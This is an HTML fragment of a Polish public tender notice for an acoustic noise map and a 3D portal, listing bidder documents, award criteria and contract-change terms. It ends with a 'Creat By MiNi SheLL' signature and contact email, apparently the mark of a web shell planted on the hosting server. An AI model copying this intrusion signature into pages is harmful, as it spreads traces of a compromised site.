2)	zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
Uwaga:
a)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia,
b)	w przypadku wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy Prawo zamówień publicznych, przedmiotowy dokument należy złożyć także w odniesieniu do tych podmiotów, 
3)	odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Prawo zamówień publicznych;
Uwaga:
a)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia,
b)	w przypadku wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy Prawo zamówień publicznych, przedmiotowy dokument należy złożyć także w odniesieniu do tych podmiotów.

UWAGA:
1.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w sekcji III.4) pkt 1)3) ogłoszenia o zamówieniu  składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
b) nie otwarto jego likwidacji ani nie ogłoszono upadłości.
2.	Dokumenty, o których mowa w pkt 1 lit. b) UWAGI, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu. Dokument, o którym mowa w pkt 1 lit. a) UWAGI, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem tego terminu.
3.	Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt 1. UWAGI, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Zapisy pkt 2. UWAGI stosuje się.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1)	Wykaz usług wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie Wykonawcy;
Uwaga:
a)	dokument składany jest na potwierdzenie spełniania warunku udziału określonego w pkt V lit. D. ppkt 3. poz. 1) SIWZ,
b)	przedmiot wykazanych usług należy podać z taką szczegółowością, która umożliwi Zamawiającemu sprawdzenie spełniania warunku określonego w pkt V. lit. D. ppkt 3. poz. 1) SIWZ,
c)	dla usługi dotyczącej trójwymiarowego portalu mapy akustycznej dla miasta o ilości mieszkańców co najmniej 100 tys. należy podać adres strony internetowej, na której funkcjonuje ten portal,
d)	wykaz należy sporządzić na druku zgodnie ze wzorem stanowiącym ZAŁĄCZNIK NR 7 do SIWZ  WYKAZ USŁUG,
e)	wartości podane w walutach innych niż wskazane przez Zamawiającego należy przeliczyć wg średniego kursu NBP na dzień zakończenia wykonywania usług, podając datę i kurs,
f)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku określonego w pkt V. lit. D. ppkt 3 poz. 1) SIWZ.

2)  Wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami.
Uwaga:
a)	Dokument składany jest na potwierdzenie spełniania warunku udziału określonego w pkt V. lit. D ppkt 3 poz. 2) SIWZ.
b)	Wykaz należy sporządzić na druku zgodnie ze wzorem stanowiącym ZAŁĄCZNIK NR 8 do SIWZ  WYKAZ NARZĘDZI, WYPOSAŻENIA ZAKŁADU LUB URZĄDZEŃ TECHNICZNYCH.
c)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymieniony dokument Wykonawcy składają wspólnie.

3) Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,  doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.
Uwaga:
a)  Dokument składany jest na potwierdzenie spełniania warunku udziału określonego w pkt V. lit. D ppkt 3 poz. 3) SIWZ.
b)  W wykazie osób dla osoby, o której mowa w pkt V. lit. D. ppkt 3. poz. 3) SIWZ:
-	lit. a) - należy podać i opisać doświadczenie w realizacji co najmniej dwóch map akustycznych w miastach o liczbie mieszkańców co najmniej 100 tysięcy, podając liczbę mieszkańców,
-	lit. b) - należy podać i opisać doświadczenie w tworzeniu i wdrożeniu jednego portalu trójwymiarowego mapy akustycznej,
-	lit. c) - należy podać rodzaj i zakres posiadanych uprawnień,
-	lit. d)  należy rodzaj i zakres wykształcenia oraz podać i opisać doświadczenie w tworzeniu co najmniej 1 programu ochrony środowiska przed hałasem,
-	lit. e)  należy podać ilość lat doświadczenia w pomiarach hałasu środowiskowego.
c) Wykaz należy sporządzić na druku zgodnie ze wzorem stanowiącym ZAŁĄCZNIK NR 9 do SIWZ  WYKAZ OSÓB.
d)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymieniony dokument Wykonawcy składają wspólnie.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">1)	Oświadczenie w zakresie art. 25 ust. 1 pkt 2 ustawy Prawo zamówień publicznych.
Uwaga:
a)	Treść wymaganego Oświadczenia w zakresie art. 25 ust. 1 pkt 2 ustawy Prawo zamówień publicznych Zamawiający przekazuje na ZAŁĄCZNIKU NR 6 do SIWZ. 
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane oświadczenie Wykonawcy składają wspólnie.
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1)	Dokumenty stanowiące dowód, w szczególności zobowiązanie podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia  w przypadku Wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów.
Uwaga:
a)	Dokumenty mają określać w szczególności:
-	zakres dostępnych Wykonawcy zasobów innego podmiotu,
-	sposób wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia publicznego,
-	zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego,
-	czy podmiot, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą.
b)	Zobowiązanie należy złożyć zgodnie ze wzorem stanowiącym ZAŁĄCZNIK NR 5 do SIWZ.
2)	oświadczenie o przynależności albo braku przynależności do tej samej grupy kapitałowej
Uwaga:
a)	Wykonawca przedmiotowe oświadczenie przekazuje Zamawiającemu w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Prawo zamówień publicznych, 
b)	Wraz ze złożeniem oświadczenia, Wykonawca może złożyć dokumenty bądź informacje, potwierdzające, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia,
c)	Oświadczenie należy złożyć zgodnie ze wzorem stanowiącym ZAŁĄCZNIK NR 4 do SIWZ.
d)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>wykonanie pomiarów hałasu drogowego</td><td>25</td></tr><tr><td>wykonanie pomiarów hałasu przemysłowego </td><td>10</td></tr><tr><td>wykonanie pomiarów hałasu tramwajowego</td><td>5</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Informacja o przewidywanych zmianach postanowień zawartej umowy w stosunku do treści oferty, na podstawie której Zamawiający dokona wyboru Wykonawcy w okolicznościach, o których mowa w art. 144 ust. 1 pkt 1 ustawy Prawo zamówień publicznych:
Zakres przewidywanych zmian i charakter oraz warunki wprowadzenia zmian:
Zmiana postanowień warunków umowy w zakresie sposobu realizacji umowy może nastąpić w następujących przypadkach:
1)	zmiany wynagrodzenia:
a)	w przypadku ustawowej zmiany przepisów dotyczących procentowej stawki podatku od towarów i usług:
-	zmianie ulegnie kwota wynagrodzenia brutto określona w § 3 wzoru Umowy, 
-	zmiana wynagrodzenia nastąpi wyłącznie w stosunku do  niezrealizowanej w dniu zmiany stawki podatku od towarów i usług części zamówienia,
-	do określonego w ofercie wynagrodzenia w odniesieniu do niezrealizowanej części zamówienia zostanie zastosowana aktualnie obowiązująca na dzień dokonania zmiany stawka podatku od towarów i usług,
-	zmiana  wynagrodzenia nastąpi o kwotę wynikającą z różnicy między dotychczasową, a nową stawką podatku od towarów i usług, 
b)	w przypadku zmiany wysokości minimalnego wynagrodzenia za pracę, albo wysokości minimalnej stawki godzinowej ustalonych na podstawie art. 2-5 ustawy z dnia 10 października 2002r. o minimalnym wynagrodzeniu za pracę:
-	jeżeli zmiany te będą miały wpływ na koszty wykonania przez Wykonawcę przedmiotu umowy, każda ze stron umowy w terminie 30 dni od dnia wejścia w życie przepisów dokonujących tych zmian, może zwrócić się do drugiej strony, o zmianę wynagrodzenia, z uwagi na wyżej wymienioną okoliczność, 
-	obowiązek wykazania zmiany rzeczywiście ponoszonych kosztów z uwagi na wyżej wymienioną okoliczność należy do strony, która wystąpi z wnioskiem o przeprowadzenie negocjacji,
-	wartość wynagrodzenia ulegnie zmianie o różnicę w kosztach ponoszonych przez Wykonawcę w odniesieniu do niezrealizowanej części zamówienia jedynie w przypadku zmiany wynagrodzenia osób zatrudnionych u wykonawcy na podstawie umowy o pracę, które bezpośrednio wykonują zamówienie (o kwotę różnicy między kwotą minimalnego wynagrodzenia za pracę albo minimalnej stawki godzinowej obowiązujące w dniu złożenia oferty, a kwotą minimalnego wynagrodzenia za pracę albo minimalnej stawki godzinowej wynikającą ze zmienionych przepisów),
c)	W przypadku zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości składki stawki na ubezpieczenia społeczne lub zdrowotne:
-	 jeżeli zmiany te będą miały wpływ na koszty wykonania przez wykonawcę przedmiotu umowy, każda ze stron w terminie30 dni od dnia wejścia w życie przepisów dokonujących te zmiany może zwrócić się do drugiej strony o zmianę wynagrodzenia z uwagi na wyżej wymienioną okoliczność,
-	obowiązek wykazania zmiany rzeczywiście ponoszonych kosztów z uwagi na wyżej wymienioną okoliczność należy do strony, która wystąpi z wnioskiem o przeprowadzenie negocjacji,
-	wartość wynagrodzenia ulegnie zmianie o różnicę w kosztach ponoszonych przez Wykonawcę w odniesieniu do niezrealizowanej części zamówienia jedynie o różnicę między kosztami ponoszonymi przez Wykonawcę z tytułu podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne dotychczas i po zmianie przepisów.
2)	zaistnienia okoliczności, z przyczyn obiektywnych niezależnych od stron niniejszej umowy, powodujących konieczność zmiany pierwotnych warunków realizacji prac przewidzianych w umowie, gdy dalsza realizacja prac na dotychczasowych warunkach uniemożliwiałaby dotrzymanie przez Wykonawcę istotnych warunków i postanowień umowy, pomimo dołożenia przez Wykonawcę wszelkich starań.
3)	Zmiany umowy wymagają formy pisemnej pod rygorem nieważności.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 30/12/2016, godzina: 09:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              PL<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com